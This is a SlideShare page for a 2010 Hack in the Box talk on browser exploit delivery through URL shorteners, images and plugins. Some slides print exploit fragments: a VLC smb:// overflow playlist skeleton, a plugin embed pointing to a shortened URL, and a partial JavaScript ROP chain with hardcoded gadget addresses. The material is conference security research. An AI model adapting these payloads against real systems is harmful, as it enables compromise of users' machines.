W.E.B. 2010 - Web, Exploits, Browsers


Published on

My talk at Hack in the Box 2010 - Kuala Lumpur

It has been a decade since I started talking about computer security. 10 years have witnessed a change in threat landscapes, attack targets, exploits, techniques and damage. Two eco-systems are slowly and surely converging into one. On one hand, we have the application layer. Much has been talked about it. There is a steady trickling flow of XSS, XSRF, SQL injection and the usual suspects. Some of them are under the guise of "Web 2.0", and some of them are as ancient as CGI attacks of 1999. On the other hand, we have the desktop. Dominating the desktop is the browser, with its horde of assistants. Exploitation in this space has accelerated in the last 3 years.

How will the threat landscape change with the advent of new technologies and services? New standards are emerging, and the darling child of the web is HTML 5. A closer look at standards reveals and awful mess. Are the standards mitigating any security concerns? More importantly, will browser vendors and web application developers really respect the standards? The browser wars taught us that "might is right". If everyone breaks the web, that becomes a new adopted standard. New technologies, coupled with popular online services make for some very interesting exploit delivery techniques.

This talk explores some innovative exploit delivery techniques that are born as a result of bloated standards and services designed without much thought towards security. We cover techniques where exploits can be delivered through URL shorteners and images. We take a look at some browser exploits. This talk ends with a discussion on exploit sophistication, ranging from highly polished and elegant techniques such as Return Oriented Programming to the downright crude and ugly techniques such as DLL Hijacking. How will we combine all this together? And will Anti-Virus still save us all?

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash Sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • Sandboxing isn't the solution.
  • W.E.B. 2010 - Web, Exploits, Browsers

    1. 1. W.E.B. 2010Web . Exploits . Browsers<br />Saumil Shah<br />Hack in the Box - Kuala Lumpur 2010<br />
    2. 2. # who am i<br />Saumil Shah, CEO Net-square<br />LinkedIn: saumilshah<br />
    3. 3.
    4. 4. LOOK AT ALL THE COOL STUFF!!<br />5<br />
    5. 5. 5<br />33%<br />MORE!<br />
    6. 6. 5<br />With JIT!Fights DEP, ASLR!<br />
    7. 7. 5<br />Worldwide coverage,<br />Hides your tracks.<br />
    8. 8. 5<br />...as never seen before!<br />
    9. 9. 5<br />GUARANTEED!!<br />Fresh new bugs,<br />Present on most computers<br />
    10. 10.
    11. 11.
    12. 12.
    13. 13. I can haz sandbox<br />I Also Can!<br />
    14. 14. IM IN UR BASE<br />KILLING UR D00DZ<br />Sploit Time!<br />
    15. 15. See no EVAL<br />CVE 2010-2883<br />(0+1)day exploit<br />Obfuscated Javascript decoded without using eval, document.write, etc.<br />
    16. 16.
    17. 17. Who you gonna call?<br />
    18. 18. howstuffworks - Anti Virus<br />YER NOT ON THE LIST! COME ON IN.<br />
    19. 19. howstuffworks - Anti Virus<br />These are not the sploitz you're looking for.<br />
    20. 20. 0-day to the Face!<br />"To get our new signature files you need a valid support plan."<br />
    21. 21. ...and keep on patching<br />
    22. 22.
    23. 23. W3C<br />"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]<br />
    24. 24.
    25. 25. Application Delivery<br />The Web<br />at present<br />Authentication<br />Statefulness<br />Data Typing<br />Non-mutable<br />HTTP<br />HTML<br />AJAX<br />Flash<br />Sandbox<br />HTML5<br />Anti-XSS<br />WAF<br />Silverlight<br />Web sockets<br />MIND THE GAP<br />
    26. 26. Sploit Time!<br />
    27. 27. Making the impossible possible<br />smb:// mrl buffer overflow<br />
    28. 28. VLC smb:// overflow - playlist<br /><?xml version="1.0" encoding="UTF-8"?><br /><playlist version="1"<br /> xmlns="http://xspf.org/ns/0/"<br /> xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"><br /> <title>Playlist</title><br /> <trackList><br /> <track><br /> <location><br /> smb://example.com@{AAAAAAAA....}<br /></location><br /> <extension<br /> application="http://www.videolan.org/vlc/playlist/0"><br /> <vlc:id>0</vlc:id><br /> </extension><br /> </track><br /> </trackList><br /></playlist><br />
    29. 29. ...just add bit.ly<br />smb:// mrl buffer overflow<br />
    30. 30.
    31. 31. 100% Pure Alphanum!<br />
    32. 32. VLC smb overflow - HTMLized!!<br /><embed type="application/x-vlc-plugin"<br /> width="320" height="200"<br /> target="http://tinyurl.com/ycctrzf"<br /> id="vlc" /><br />I'm in ur browser....<br />...blowin up ur g00dz<br />pwn<br />
    33. 33.
    34. 34. I'm an evil Javascript<br />I'm an innocent image<br />
    35. 35. function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""<br />EET - Exploit Enabler Technology<br /><canvas><br />
    36. 36. The Solution?<br />HTML 8.0<br />HTTP 2.0<br />Browser Security Model<br />Self Contained Apps<br />
    37. 37. shoutz...<br />L33tdawg, Amy, cbelinda<br />KUL volunteerz<br />NL crew<br />Paul Vixie<br />
    38. 38. kthxbai<br />www.net-square.com<br />secure . automate . innovate<br />